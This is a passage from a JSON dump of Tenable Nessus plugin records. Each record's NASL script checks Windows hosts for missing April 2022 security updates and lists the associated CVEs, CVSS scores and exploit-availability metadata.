\"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26831\",\n \"CVE-2022-26832\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012653\");\n script_xref(name:\"MSFT\", value:\"MS22-5012653\");\n script_xref(name:\"IAVA\", value:\"2022-A-0143-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012653: Windows 10 version 1507 LTS Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012653. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-26798, CVE-2022-26801, CVE-2022-26786, \n CVE-2022-24549, CVE-2022-26794, CVE-2022-26802, \n CVE-2022-26792, CVE-2022-26797, CVE-2022-26787, \n CVE-2022-26803, CVE-2022-26796, CVE-2022-26790, \n CVE-2022-26904, CVE-2022-26808, CVE-2022-26788, \n CVE-2022-24544, CVE-2022-24540, CVE-2022-24486, \n CVE-2022-24481, CVE-2022-24527, CVE-2022-24474, \n CVE-2022-24521, CVE-2022-24550, CVE-2022-24547, \n CVE-2022-24499, CVE-2022-24494, CVE-2022-24542, \n CVE-2022-24530, CVE-2022-26807)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916, \n CVE-2022-26919, CVE-2022-26917, CVE-2022-26809, \n CVE-2022-26918, CVE-2022-24541, CVE-2022-24492, \n CVE-2022-24491, CVE-2022-24534, CVE-2022-24485, \n CVE-2022-24533, CVE-2022-26903, CVE-2022-24528, \n CVE-2022-21983, CVE-2022-22008, CVE-2022-24500)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493, CVE-2022-24498,\n CVE-2022-24483)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012653\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012653\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012653'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012653])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:11", "description": "The remote Windows host is missing security update 5012666 or cumulative update 5012650. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26812, CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916, CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528, CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26796, CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807, CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801, CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012666: Windows Server 2012 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26784", "CVE-2022-26787", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012666.NASL", "href": "https://www.tenable.com/plugins/nessus/159676", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159676);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26784\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012650\");\n script_xref(name:\"MSKB\", value:\"5012666\");\n script_xref(name:\"MSFT\", value:\"MS22-5012650\");\n script_xref(name:\"MSFT\", value:\"MS22-5012666\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012666: Windows Server 2012 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012666\nor cumulative update 5012650. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26812,\n CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916,\n CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528,\n CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26796,\n CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807,\n CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801,\n CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012666 or Cumulative Update 5012650\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012666',\n '5012650'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012666, 5012650])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:38", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012639. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012649.NASL", "href": "https://www.tenable.com/plugins/nessus/159672", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159672);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012626\");\n script_xref(name:\"MSKB\", value:\"5012649\");\n script_xref(name:\"MSFT\", value:\"MS22-5012626\");\n script_xref(name:\"MSFT\", value:\"MS22-5012649\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012639. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5012649 or Cumulative Update KB5012626.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012649',\n '5012626'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012649, 5012626])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-26827, CVE-2022-24549, CVE-2022-26810, CVE-2022-26803, CVE-2022-26808, CVE-2022-26807, CVE-2022-26792, CVE-2022-26801, CVE-2022-26802, CVE-2022-26794, CVE-2022-26790, CVE-2022-26797, CVE-2022-26787, CVE-2022-26798, CVE-2022-26796, CVE-2022-26786, CVE-2022-26904, CVE-2022-26788, CVE-2022-24496, CVE-2022-24544, CVE-2022-24540, CVE-2022-24489, CVE-2022-24486, 